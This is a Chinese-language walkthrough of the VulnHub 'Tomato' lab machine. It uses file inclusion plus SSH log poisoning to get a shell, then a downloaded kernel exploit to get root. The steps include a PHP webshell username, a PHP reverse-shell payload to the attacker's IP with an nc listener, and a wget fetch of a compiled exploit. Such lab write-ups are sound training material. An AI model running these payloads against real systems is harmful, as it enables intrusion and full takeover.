这个靶机挺有意思,它是通过文件包含漏洞进行的getshell,主要姿势是将含有一句话木马的内容记录到ssh的登录日志中,然后利用文件包含漏洞进行包含,从而拿到shell
0x01 靶机信息
靶机:Tomato
难度:中—难
下载:https://www.vulnhub.com/entry/tomato-1,557/
靶机描述:
0x02 信息收集
nmap扫描存活主机确定靶场ip
nmap -sP 192.168.43.0/24
接下来扫描靶机的端口
nmap -sS -sV -p- -v 192.168.43.165
0x03 漏洞发现
然后访问web服务
网站目录扫描
dirb http://192.168.43.165:80
访问antibot_image发现存在目录遍历
发现info.php是phpinfo的界面
查看页面源代码发现一串文件包含的代码
http://192.168.43.165/antibot_image/antibots/info.php?image=/etc/passwd
0x04 漏洞利用
接下来尝试文件包含被污染的SSH日志来getshell
ssh '<?php system($_GET['shell']); ?>'@192.168.43.165 -p2211
这样'<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去
ssh日志在/var/log/auth.log中
开启nc监听
nc -lvnp 3388
反弹shell 将
http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'
其中以下语句是建立socket会话,然后反向连接
php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'
然后进行url编码
http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.43.221%22%2c3388)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
访问URL,成功反弹shell
0x05 权限提升
我们首先建立可交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
然后查看linux内核版本
uname -a
去github上去找这个版本的exp
https://github.com/kkamagui/linux-kernel-exploits
用这个CVE-2017-6074的
、
下载到本地
git clone https://github.com/kkamagui/linux-kernel-exploits.git
然后运行compile.sh 编译c文件
并上传到目标主机
python -m SimpleHTTPServer 8000
然后用wget下载到靶机上
wget http://192.168.43.221:8000/CVE-2017-6074
查看该文件的权限
ls -l
赋予执行权限
chmod +x CVE-2017-6074
运行该文件
发现已经拿到root权限
参考:https://mp.weixin.qq.com/s/40zG1Tjmo_8pbbpN-IWZ4A